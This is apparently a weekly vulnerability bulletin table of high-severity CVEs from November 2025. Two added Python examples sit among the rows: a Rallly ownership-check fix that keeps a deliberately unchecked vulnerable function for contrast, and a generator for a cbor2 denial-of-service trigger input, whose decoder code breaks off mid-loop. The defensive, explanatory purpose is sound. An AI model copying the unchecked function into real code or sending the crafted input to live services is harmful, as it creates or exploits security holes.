| HAProxy Technologies--HAProxy Community Edition | Inefficient algorithm complexity in mjson in HAProxy allows remote attackers to cause a denial of service via specially crafted JSON requests. | 2025-11-19 | 7.5 | CVE-2025-11230 | https://www.haproxy.com/blog/october-2025-cve-2025-11230-haproxy-mjson-library-denial-of-service-vulnerability   |
| HashiCorp--Tooling | Vault's Terraform Provider incorrectly set the default deny_null_bind parameter for the LDAP auth method to false by default, potentially resulting in an insecure configuration. If the underlying LDAP server allowed anonymous or unauthenticated binds, this could result in authentication bypass. This vulnerability, CVE-2025-13357, is fixed in Vault Terraform Provider v5.5.0. | 2025-11-21 | 7.4 | CVE-2025-13357 | https://discuss.hashicorp.com/t/hcsec-2025-33-vault-terraform-provider-applied-incorrect-defaults-for-ldap-auth-method/76822   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking 100 Series Cellular Bridge | A vulnerability in the web-based management interface of affected products could allow an unauthenticated remote attacker to cause a denial of service. Successful exploitation could allow an attacker to crash the system, preventing it from rebooting without manual intervention and disrupting network operations. | 2025-11-18 | 7.5 | CVE-2025-37161 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04970en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A vulnerability in the SSH restricted shell interface of the network management services allows improper access control for authenticated read-only users. If successfully exploited, this vulnerability could allow an attacker with read-only privileges to gain administrator access on the affected system. | 2025-11-18 | 7.8 | CVE-2025-37155 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking Management Software (Airwave) | A command injection vulnerability has been identified in the command line interface of the HPE Aruba Networking Airwave Platform. An authenticated attacker could exploit this vulnerability to execute arbitrary operating system commands with elevated privileges on the underlying operating system. | 2025-11-18 | 7.2 | CVE-2025-37163 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04971en_us&docLocale=en_US   |
| homarr-labs--homarr | Homarr is an open-source dashboard. Prior to version 1.43.3, a stored XSS vulnerability exists, allowing the execution of arbitrary JavaScript in a user's browser, with minimal or no user interaction required, due to the rendering of a malicious uploaded SVG file. This could be abused to add an attacker's account to the "credentials-admin" group, giving them full administrative access, if a user logged in as an administrator were to view the page which renders or redirects to the SVG. This issue has been patched in version 1.43.3. | 2025-11-19 | 8.1 | CVE-2025-64759 | https://github.com/homarr-labs/homarr/security/advisories/GHSA-wj62-c5gr-2x53 https://github.com/homarr-labs/homarr/commit/aaa23f37321be1e110f722b36889b2fd3bea2059 |
| husainali52--WP AUDIO GALLERY | The WP AUDIO GALLERY plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 2.0. This is due to the `wpag_uploadaudio_callback()` AJAX handler not properly validating user-supplied file paths in the `audio_upload` parameter before passing them to `unlink()`. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when critical files like wp-config.php are deleted. | 2025-11-21 | 8.1 | CVE-2025-13322 | https://www.wordfence.com/threat-intel/vulnerabilities/id/101675ae-88cf-42fc-b9ea-5dd37cdf7464?source=cve https://plugins.trac.wordpress.org/browser/wp-audio-gallery/tags/2.0/wp-audio-gallery.php#L150 https://plugins.trac.wordpress.org/browser/wp-audio-gallery/tags/2.0/wp-audio-gallery.php#L513 https://plugins.trac.wordpress.org/browser/wp-audio-gallery/tags/2.0/wp-audio-gallery.php#L607   |
| IBM--IBM Planning Analytics Local | IBM Planning Analytics Local 2.1.0 through 2.1.14 could allow a remote authenticated user to traverse directories on the system. An attacker could send a specially crafted URL request containing absolute path sequences to view, read, or write arbitrary files on the system. | 2025-11-17 | 8 | CVE-2025-36357 | https://www.ibm.com/support/pages/node/7251265   |
| IBM--Storage Virtualize | IBM Storage Virtualize 8.4, 8.5, 8.7, and 9.1 IKEv1 implementation allows remote attackers to obtain sensitive information from device memory via a Security Association (SA) negotiation request. | 2025-11-17 | 7.5 | CVE-2025-36118 | https://www.ibm.com/support/pages/node/7250954   |
| IBM--webMethods Integration | IBM webMethods Integration 10.11 through 10.11_Core_Fix22, 10.15 through 10.15_Core_Fix22, and 11.1 through 11.1_Core_Fix6 allows an authenticated user to execute arbitrary code on the system, caused by the deserialization of untrusted object graph data. | 2025-11-20 | 8.8 | CVE-2025-36072 | https://www.ibm.com/support/pages/node/7252090 |
| ideastocode--Enable SVG, WebP, and ICO Upload | The Enable SVG, WebP, and ICO Upload plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 1.1.2. This is due to insufficient file type validation detecting ICO files, allowing double extension files with the appropriate magic bytes to bypass sanitization while being accepted as a valid ICO file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-18 | 8.8 | CVE-2025-13069 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5716c4e1-a6d3-42e8-b90c-d16f204c8503?source=cve https://wordpress.org/plugins/enable-svg-webp-ico-upload/   |
| ikhodal--Category and Product Woocommerce Tabs | The Category and Product Woocommerce Tabs plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.0. This is due to insufficient input validation on the 'template' parameter in the categoryProductTab() function. This makes it possible for authenticated attackers, with contributor level access and above, to include and execute arbitrary .php files on the server. | 2025-11-18 | 8.8 | CVE-2025-13088 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c3938bbb-dc3d-4550-a05d-0cde970e38f8?source=cve https://plugins.trac.wordpress.org/browser/category-and-product-woocommerce-tabs/tags/1.0/include/wccategorytab.php#L108   |
| iqonicdesign--WPBookit | The WPBookit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'css_code' parameter in all versions up to, and including, 1.0.6 due to a missing capability check on the save_custome_code() function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 7.2 | CVE-2025-12135 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7d7b2c79-c4f7-4611-a22a-685d4421a4ab?source=cve https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/class.wpb-admin-routes-handler.php#L15 https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/class.wpb-admin-routes.php#L118 https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/controllers/class.wpb-setting-controller.php#L16 https://github.com/d0n601/CVE-2025-12135 https://ryankozak.com/posts/cve-2025-12135/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398463%40wpbookit&new=3398463%40wpbookit&sfp_email=&sfph_mail=   |
| isaacs--node-glob | Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0. | 2025-11-17 | 7.5 | CVE-2025-64756 | https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2 https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146 |
| itsourcecode--Human Resource Management System | A weakness has been identified in itsourcecode Human Resource Management System 1.0. This issue affects some unknown processing of the file /src/store/EventStore.php. This manipulation of the argument eventSubject causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-11-19 | 7.3 | CVE-2025-13420 | VDB-332942: itsourcecode Human Resource Management System EventStore.php sql injection; VDB-332942: CTI Indicators (IOB, IOC, TTP, IOA); Submit #695952: itsourcecode Human Resource Management System V1.0 SQL Injection; https://github.com/f14g-orz/CVE/issues/8 https://itsourcecode.com/ |
| itsourcecode--Human Resource Management System | A security vulnerability has been detected in itsourcecode Human Resource Management System 1.0. Impacted is an unknown function of the file /src/store/NoticeStore.php. Such manipulation of the argument noticeDesc leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-11-19 | 7.3 | CVE-2025-13421 | VDB-332943: itsourcecode Human Resource Management System NoticeStore.php sql injection; VDB-332943: CTI Indicators (IOB, IOC, TTP, IOA); Submit #695953: itsourcecode Human Resource Management System V1.0 SQL Injection; https://github.com/f14g-orz/CVE/issues/9 https://itsourcecode.com/ |
| itsourcecode--Inventory Management System | A security vulnerability has been detected in itsourcecode Inventory Management System 1.0. The affected element is an unknown function of the file /admin/user/index.php?view=edit. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. | 2025-11-17 | 7.3 | CVE-2025-13257 | VDB-332592: itsourcecode Inventory Management System index.php sql injection; VDB-332592: CTI Indicators (IOB, IOC, TTP, IOA); Submit #687863: itsourcecode Inventory Management System V1.0 SQL Injection; https://github.com/iamzzzzz/iam/issues/3 https://itsourcecode.com/ |
| itsourcecode--Online File Management System | A security flaw has been discovered in itsourcecode Online File Management System 1.0. This issue affects some unknown processing of the file /ajax.php?action=login. The manipulation of the argument Username results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be exploited. | 2025-11-21 | 7.3 | CVE-2025-13485 | VDB-333085: itsourcecode Online File Management System ajax.php sql injection; VDB-333085: CTI Indicators (IOB, IOC, TTP, IOA); Submit #696405: Itsourcecode Online File Management System V1.0 SQL Injection; https://github.com/jaisurya-me/CVE/issues/1 https://itsourcecode.com/ |
| itsourcecode--Online Voting System | A vulnerability was identified in itsourcecode Online Voting System 1.0. The affected element is an unknown function of the file /login.php. Such manipulation of the argument Username leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. | 2025-11-17 | 7.3 | CVE-2025-13285 | VDB-332625: itsourcecode Online Voting System login.php sql injection; VDB-332625: CTI Indicators (IOB, IOC, TTP, IOA); Submit #690884: itsourcecode Online Voting System V1.0 SQL Injection; Submit #690887: itsourcecode Online Voting System V1.0 SQL Injection (Duplicate); https://github.com/WANGshuyan2025/cve/issues/6 https://itsourcecode.com/ |
| itsourcecode--Web-Based Internet Laboratory Management System | A security vulnerability has been detected in itsourcecode Web-Based Internet Laboratory Management System 1.0. The impacted element is an unknown function of the file /course/controller.php. Such manipulation leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-11-17 | 7.3 | CVE-2025-13297 | VDB-332637: itsourcecode Web-Based Internet Laboratory Management System controller.php sql injection; VDB-332637: CTI Indicators (IOB, IOC, TTP, IOA); Submit #691786: itsourcecode Web-Based Internet Laboratory Management System V1.0 SQL Injection; https://github.com/f14g-orz/CVE/issues/3 https://itsourcecode.com/ |
| itsourcecode--Web-Based Internet Laboratory Management System | A vulnerability was detected in itsourcecode Web-Based Internet Laboratory Management System 1.0. This affects an unknown function of the file /enrollment/controller.php. Performing manipulation results in sql injection. The attack can be carried out remotely. The exploit is now public and may be used. | 2025-11-17 | 7.3 | CVE-2025-13298 | VDB-332638: itsourcecode Web-Based Internet Laboratory Management System controller.php sql injection; VDB-332638: CTI Indicators (IOB, IOC, TTP, IOA); Submit #691787: itsourcecode Web-Based Internet Laboratory Management System V1.0 SQL Injection; https://github.com/f14g-orz/CVE/issues/4 https://itsourcecode.com/ |
| itsourcecode--Web-Based Internet Laboratory Management System | A flaw has been found in itsourcecode Web-Based Internet Laboratory Management System 1.0. This impacts an unknown function of the file /user/controller.php. Executing manipulation can lead to sql injection. The attack may be performed remotely. The exploit has been published and may be used. | 2025-11-17 | 7.3 | CVE-2025-13299 | VDB-332639: itsourcecode Web-Based Internet Laboratory Management System controller.php sql injection; VDB-332639: CTI Indicators (IOB, IOC, TTP, IOA); Submit #691789: itsourcecode Web-Based Internet Laboratory Management System V1.0 SQL Injection; https://github.com/f14g-orz/CVE/issues/5 https://itsourcecode.com/ |
| itsourcecode--Web-Based Internet Laboratory Management System | A vulnerability has been found in itsourcecode Web-Based Internet Laboratory Management System 1.0. Affected is an unknown function of the file /settings/controller.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-11-17 | 7.3 | CVE-2025-13300 | VDB-332640: itsourcecode Web-Based Internet Laboratory Management System controller.php sql injection; VDB-332640: CTI Indicators (IOB, IOC, TTP, IOA); Submit #691790: itsourcecode Web-Based Internet Laboratory Management System V1.0 SQL Injection; https://github.com/f14g-orz/CVE/issues/6 https://itsourcecode.com/ |
| itsourcecode--Web-Based Internet Laboratory Management System | A vulnerability was found in itsourcecode Web-Based Internet Laboratory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /subject/controller.php. The manipulation results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2025-11-17 | 7.3 | CVE-2025-13301 | VDB-332641: itsourcecode Web-Based Internet Laboratory Management System controller.php sql injection; VDB-332641: CTI Indicators (IOB, IOC, TTP, IOA); Submit #691793: itsourcecode Web-Based Internet Laboratory Management System V1.0 SQL Injection; https://github.com/f14g-orz/CVE/issues/7 https://itsourcecode.com/ |
| jackdewey--Community Events | The Community Events plugin for WordPress is vulnerable to SQL Injection via the 'dayofyear' parameter in all versions up to, and including, 1.5.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-19 | 7.5 | CVE-2025-12646 | https://www.wordfence.com/threat-intel/vulnerabilities/id/579b6eb0-dbb7-4586-aecc-f295889a2b2b?source=cve https://plugins.trac.wordpress.org/changeset/3396731/community-events/trunk/community-events.php   |
| jemoreto--Multiple Roles per User | The Multiple Roles per User plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mrpu_add_multiple_roles_ui' and 'mrpu_save_multiple_user_roles' functions in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, granted the 'edit_users' capability, to edit any user's role, including promoting users to Administrator and demoting Administrators to lower-privileged roles. | 2025-11-18 | 7.2 | CVE-2025-11620 | https://www.wordfence.com/threat-intel/vulnerabilities/id/30741601-50b9-4799-a340-11f6ffa59553?source=cve https://plugins.trac.wordpress.org/browser/multiple-roles-per-user/trunk/multiple-roles-per-user.php#L54 https://plugins.trac.wordpress.org/browser/multiple-roles-per-user/trunk/multiple-roles-per-user.php#L121   |
| listingthemes--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'columns_search' parameter of the select_2_ajax() function in all versions up to, and including, 1.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-21 | 7.5 | CVE-2025-13138 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0cad8c48-5c96-484c-acda-b33d8d8d10d3?source=cve https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.3/application/controllers/Wdk_frontendajax.php#L546 https://wordpress.org/plugins/wpdirectorykit/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail=   |
| lsfusion--platform | A vulnerability was determined in lsfusion platform up to 6.1. Affected by this vulnerability is the function UploadFileRequestHandler of the file platform/web-client/src/main/java/lsfusion/http/controller/file/UploadFileRequestHandler.java. Executing manipulation of the argument sid can lead to path traversal. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-17 | 7.3 | CVE-2025-13262 | VDB-332597: lsfusion platform UploadFileRequestHandler.java UploadFileRequestHandler path traversal; VDB-332597: CTI Indicators (IOB, IOC, TTP, IOA); Submit #689414: lsFusion 6.1 Arbitrary File Upload; https://github.com/lsfusion/platform/issues/1544 https://github.com/lsfusion/platform/issues/1544#issue-3589610731 |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an Insecure Direct Object Reference (IDOR) vulnerability exists in the poll finalization feature of the application. Any authenticated user can finalize a poll they do not own by manipulating the pollId parameter in the request. This allows unauthorized users to finalize other users' polls and convert them into events without proper authorization checks, potentially disrupting user workflows and causing data integrity and availability issues. This issue has been patched in version 4.5.4. | 2025-11-19 | 9.1 | CVE-2025-65021 | https://github.com/lukevella/rallly/security/advisories/GHSA-x7w2-g548-4qg8 https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an insecure direct object reference (IDOR) vulnerability allows any authenticated user to delete arbitrary participants from polls without ownership verification. The endpoint relies solely on a participant ID to authorize deletions, enabling attackers to remove other users (including poll owners) from polls. This impacts the integrity and availability of poll participation data. This issue has been patched in version 4.5.4. | 2025-11-19 | 8.1 | CVE-2025-65029 | https://github.com/lukevella/rallly/security/advisories/GHSA-f8jc-6746-ww95 https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an authorization flaw in the poll management feature allows any authenticated user to pause or resume any poll, regardless of ownership. The system only uses the public pollId to identify polls, and it does not verify whether the user performing the action is the poll owner. As a result, any user can disrupt polls created by others, leading to a loss of integrity and availability across the application. This issue has been patched in version 4.5.4. | 2025-11-19 | 8.1 | CVE-2025-65033 | https://github.com/lukevella/rallly/security/advisories/GHSA-4p93-v53r-vch3 https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an improper authorization vulnerability allows any authenticated user to reopen finalized polls belonging to other users by manipulating the pollId parameter. This can disrupt events managed by other users and compromise both availability and integrity of poll data. This issue has been patched in version 4.5.4. | 2025-11-19 | 8.1 | CVE-2025-65034 | https://github.com/lukevella/rallly/security/advisories/GHSA-5fp2-pv2j-rqpc https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an authorization flaw in the comment deletion API allows any authenticated user to delete comments belonging to other users, including poll owners and administrators. The endpoint relies solely on the comment ID for deletion and does not validate whether the requesting user owns the comment or has permission to remove it. This issue has been patched in version 4.5.4. | 2025-11-19 | 7.1 | CVE-2025-65030 | https://github.com/lukevella/rallly/security/advisories/GHSA-4j32-25f9-qgfm https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
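The five Rallly rows above (CVE-2025-65021, -65029, -65033, -65034 and -65030) describe one defect in five endpoints: a mutation authorized by nothing but the object ID carried in the request. The following is an added example, not Rallly's code, showing the shape of the check each of those endpoints needs: resolve the target (poll, participant or comment) back to its poll, then compare the poll's owner with the authenticated caller, and answer "not found" and "not yours" identically so IDs cannot be probed. The data model, user names and IDs are constructed for illustration.

```python
"""Owner-scoped authorization for poll actions (illustrative, not Rallly's code).

Every mutation resolves its target back to a poll and checks that the caller owns
that poll, instead of trusting a pollId / participantId / commentId from the request.
The model, names and identifiers below are constructed.
"""
from dataclasses import dataclass, field


class NotAuthorized(Exception):
    """Raised for both 'not found' and 'not yours' so callers cannot enumerate IDs."""


@dataclass
class Poll:
    id: str
    owner_id: str
    status: str = "live"                                   # live | paused | finalized
    participants: dict = field(default_factory=dict)       # participant_id -> user_id


@dataclass
class Comment:
    id: str
    poll_id: str
    author_id: str


class PollService:
    def __init__(self) -> None:
        self.polls: dict[str, Poll] = {}
        self.comments: dict[str, Comment] = {}

    # The single ownership check every mutation funnels through.
    def _owned_poll(self, actor_id: str, poll_id: str) -> Poll:
        poll = self.polls.get(poll_id)
        if poll is None or poll.owner_id != actor_id:
            raise NotAuthorized("poll not found or not owned by caller")
        return poll

    # Vulnerable shape described in the advisories: the ID alone authorizes the action.
    def finalize_poll_unchecked(self, poll_id: str) -> None:
        self.polls[poll_id].status = "finalized"

    # Hardened equivalents. actor_id comes from the session, never from a request field.
    def finalize_poll(self, actor_id: str, poll_id: str) -> None:
        self._owned_poll(actor_id, poll_id).status = "finalized"

    def reopen_poll(self, actor_id: str, poll_id: str) -> None:
        self._owned_poll(actor_id, poll_id).status = "live"

    def set_paused(self, actor_id: str, poll_id: str, paused: bool) -> None:
        poll = self._owned_poll(actor_id, poll_id)
        if poll.status == "finalized":
            raise ValueError("finalized polls cannot be paused or resumed")
        poll.status = "paused" if paused else "live"

    def delete_participant(self, actor_id: str, participant_id: str) -> None:
        # Resolve the participant to its poll first; a bare participant ID proves nothing.
        for poll in self.polls.values():
            if participant_id in poll.participants:
                del self._owned_poll(actor_id, poll.id).participants[participant_id]
                return
        raise NotAuthorized("participant not found")

    def delete_comment(self, actor_id: str, comment_id: str) -> None:
        comment = self.comments.get(comment_id)
        if comment is None:
            raise NotAuthorized("comment not found")
        poll = self.polls.get(comment.poll_id)
        is_author = comment.author_id == actor_id
        is_owner = poll is not None and poll.owner_id == actor_id
        if not (is_author or is_owner):
            raise NotAuthorized("caller may not delete this comment")
        del self.comments[comment_id]


def denied(action, *args) -> bool:
    """True if the ownership check refuses the action."""
    try:
        action(*args)
    except NotAuthorized:
        return True
    return False


def sample_service() -> PollService:
    """Constructed fixture: alice owns poll p1; bob participates and left a comment."""
    svc = PollService()
    svc.polls["p1"] = Poll("p1", "alice", participants={"part-bob": "bob"})
    svc.comments["c1"] = Comment("c1", "p1", "bob")
    return svc


if __name__ == "__main__":
    svc = sample_service()
    print("mallory finalizes p1, denied:", denied(svc.finalize_poll, "mallory", "p1"))
    svc.finalize_poll("alice", "p1")
    print("owner finalizes p1, status:", svc.polls["p1"].status)
```

The point of `_owned_poll` is that it is the only path to a `Poll` object for write operations; an endpoint that receives a participant or comment ID has to walk to the poll before it can call it, which is exactly the step the advisories say was missing.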
| METZ CONNECT--Energy-Controlling EWIO2-M | The commissioning wizard on the affected devices does not validate if the device is already initialized. An unauthenticated remote attacker can construct POST requests to set root credentials. | 2025-11-18 | 9.8 | CVE-2025-41733 | https://certvde.com/de/advisories/VDE-2025-097   |
| METZ CONNECT--Energy-Controlling EWIO2-M | An unauthenticated remote attacker can execute arbitrary php files and gain full access of the affected devices. | 2025-11-18 | 9.8 | CVE-2025-41734 | https://certvde.com/de/advisories/VDE-2025-097   |
| METZ CONNECT--Energy-Controlling EWIO2-M | A low privileged remote attacker can upload any file to an arbitrary location due to missing file check resulting in remote code execution. | 2025-11-18 | 8.8 | CVE-2025-41735 | https://certvde.com/de/advisories/VDE-2025-097   |
| METZ CONNECT--Energy-Controlling EWIO2-M | A low privileged remote attacker can upload a new or overwrite an existing python script by using a path traversal of the target filename in php resulting in a remote code execution. | 2025-11-18 | 8.8 | CVE-2025-41736 | https://certvde.com/de/advisories/VDE-2025-097   |
| METZ CONNECT--Energy-Controlling EWIO2-M | Due to webserver misconfiguration an unauthenticated remote attacker is able to read the source of php modules. | 2025-11-18 | 7.5 | CVE-2025-41737 | https://certvde.com/de/advisories/VDE-2025-097   |
| Microsoft--Azure Bastion Developer | Azure Bastion Elevation of Privilege Vulnerability | 2025-11-20 | 10 | CVE-2025-49752 | Azure Bastion Elevation of Privilege Vulnerability   |
| Microsoft--Azure Monitor Control Service | Azure Monitor Elevation of Privilege Vulnerability | 2025-11-20 | 8.6 | CVE-2025-62207 | Azure Monitor Elevation of Privilege Vulnerability   |
| Microsoft--Dynamics OmniChannel SDK Storage Containers | Improper authorization in Dynamics OmniChannel SDK Storage Containers allows an unauthorized attacker to elevate privileges over a network. | 2025-11-20 | 8.8 | CVE-2025-64655 | Dynamics OmniChannel SDK Storage Containers Elevation of Privilege Vulnerability   |
| Microsoft--Microsoft 365 Defender Portal | Microsoft Defender Portal Spoofing Vulnerability | 2025-11-20 | 8.3 | CVE-2025-62459 | Microsoft Defender Portal Spoofing Vulnerability   |
| Microsoft--Microsoft SharePoint Online | Microsoft SharePoint Online Elevation of Privilege Vulnerability | 2025-11-20 | 9.8 | CVE-2025-59245 | Microsoft SharePoint Online Elevation of Privilege Vulnerability   |
| Mitsubishi Electric Corporation--MILCO.S Setting Application | Uncontrolled Search Path Element Vulnerability in Setting and Operation Application for Lighting Control System MILCO.S Setting Application all versions, MILCO.S Setting Application (IR) all versions, MILCO.S Easy Setting Application (IR) all versions, and MILCO.S Easy Switch Application (IR) all versions allows a local attacker to execute malicious code by having the installer load a malicious DLL. If the signer name "Mitsubishi Electric Lighting" appears on the "Digital Signatures" tab of the properties of "MILCO.S Lighting Control.exe", the installed application is the fixed version. This vulnerability is exploitable only while the installer is running, not after installation. If a user downloads the affected product directly from the Mitsubishi Electric website and installs it, there is no risk of malicious code being introduced. | 2025-11-18 | 7 | CVE-2025-10089 | https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-015_en.pdf https://jvn.jp/vu/JVNVU97181602/   |
| Muse Group--MuseHub | A security flaw has been discovered in Muse Group MuseHub 2.1.0.1567. The affected element is an unknown function of the file C:\Program Files\WindowsApps\Muse.MuseHub_2.1.0.1567_x64__rb9pth70m6nz6\Muse.Updater.exe of the component Windows Service. The manipulation results in an unquoted search path. The attack is only possible with local access. A high complexity level is associated with this attack. The exploitability is described as difficult. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-20 | 7 | CVE-2025-13433 | VDB-332977; Muse Group MuseHub Windows Service Muse.Updater.exe unquoted search path VDB-332977; CTI Indicators (IOB, IOC, TTP, IOA) Submit #687547; Muse Group MuseHub 2.1.0.1567 Unquoted Search Path https://github.com/lakshayyverma/CVE-Discovery/blob/main/Musehub.md |
| n/a--cbor2 through version 5.7.0 | Multiple vulnerabilities exist in cbor2 through version 5.7.0 in the decode_definite_long_string() function of the C extension decoder (source/decoder.c): (1) Integer Underflow Leading to Out-of-Bounds Read (CWE-191, CWE-125): An incorrect variable reference and missing state reset in the chunk processing loop causes buffer_length to not be reset to zero after UTF-8 character consumption. This results in subsequent chunk_length calculations producing negative values (e.g., chunk_length = 65536 - buffer_length), which are passed as signed integers to the read() method, potentially triggering unlimited read operations and resource exhaustion. (2) Memory Leak via Missing Reference Count Release (CWE-401): The main processing loop fails to release Python object references (Py_DECREF) for chunk objects allocated in each iteration. For CBOR strings longer than 65536 bytes, this causes cumulative memory leaks proportional to the payload size, enabling memory exhaustion attacks through repeated processing of large CBOR payloads. Both vulnerabilities can be exploited remotely without authentication by sending specially-crafted CBOR data containing definite-length text strings with multi-byte UTF-8 characters positioned at 65536-byte chunk boundaries. Successful exploitation results in denial of service through process crashes (CBORDecodeEOF exceptions) or memory exhaustion. The vulnerabilities affect all applications using cbor2's C extension to process untrusted CBOR data, including web APIs, IoT data collectors, and message queue processors. Fixed in commit 851473490281f82d82560b2368284ef33cf6e8f9 pushed with released version 5.7.1. | 2025-11-18 | 7.5 | CVE-2025-64076 | https://github.com/agronholm/cbor2/issues/264 https://github.com/agronholm/cbor2/pull/265 https://github.com/agronholm/cbor2/commit/851473490281f82d82560b2368284ef33cf6e8f9   |
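The cbor2 row above gives enough detail to reproduce the triggering input shape (a definite-length text string longer than 65536 bytes with a multi-byte UTF-8 character straddling a chunk boundary) and the invariant a chunked decoder must keep (the count of carried-over bytes is reset every round, so the next read size is computed from the bytes still owed and can never go negative). The following Python is an added example; it is not cbor2's decoder.c and not the fix in commit 851473490281f82d82560b2368284ef33cf6e8f9. It builds such a test vector and decodes it with a boundary-safe chunked loop. The 65536-byte chunk size is the one named in the advisory; the vector contents and all function names are constructed.

```python
"""Constructed CBOR test vector for the chunk-boundary case, plus a boundary-safe chunked
decoder. Added example: not cbor2's decoder.c, and it does not reproduce cbor2's bug.
CHUNK is the 65536-byte chunk size from the advisory; everything else is constructed."""
import io
import struct

CHUNK = 65536


def encode_text_string(s: str) -> bytes:
    """CBOR definite-length text string (major type 3) with the shortest length encoding."""
    payload = s.encode("utf-8")
    n = len(payload)
    if n < 24:
        head = bytes([0x60 | n])
    elif n < 1 << 8:
        head = bytes([0x78, n])
    elif n < 1 << 16:
        head = b"\x79" + struct.pack(">H", n)
    elif n < 1 << 32:
        head = b"\x7a" + struct.pack(">I", n)
    else:
        head = b"\x7b" + struct.pack(">Q", n)
    return head + payload


def boundary_vector() -> bytes:
    """65535 ASCII bytes, then U+20AC (E2 82 AC) straddling payload offset 65536, then a tail."""
    return encode_text_string("a" * (CHUNK - 1) + "\u20ac" + "tail")


def incomplete_tail_len(buf: bytes) -> int:
    """Number of trailing bytes in buf that belong to a UTF-8 sequence cut short by the chunk edge."""
    for back in range(1, min(4, len(buf)) + 1):
        b = buf[-back]
        if (b & 0xC0) == 0x80:        # continuation byte: keep scanning back for the lead byte
            continue
        if b < 0x80:
            need = 1
        elif (b & 0xE0) == 0xC0:
            need = 2
        elif (b & 0xF0) == 0xE0:
            need = 3
        elif (b & 0xF8) == 0xF0:
            need = 4
        else:
            return 0                  # invalid lead byte; let str.decode() raise on it
        return back if need > back else 0
    return 0


def decode_text_string(data: bytes, chunk: int = CHUNK) -> str:
    """Decode a definite-length text string reading at most `chunk` bytes per round (chunk >= 4)."""
    stream = io.BytesIO(data)
    initial = stream.read(1)
    if not initial or (initial[0] >> 5) != 3:
        raise ValueError("not a CBOR text string")
    ai = initial[0] & 0x1F
    if ai < 24:
        remaining = ai
    elif ai in (24, 25, 26, 27):
        width = 1 << (ai - 24)                                # 1, 2, 4 or 8 length bytes
        remaining = int.from_bytes(stream.read(width), "big")
    else:
        raise ValueError("indefinite-length strings are out of scope here")

    pieces = []
    carry = b""                       # at most 3 bytes of a character cut by the previous round
    while remaining > 0:
        want = min(chunk - len(carry), remaining)  # room after the carry; never negative
        assert want > 0
        buf = carry + stream.read(want)
        if len(buf) != len(carry) + want:
            raise EOFError("premature end of input")          # the CBORDecodeEOF analogue
        remaining -= want
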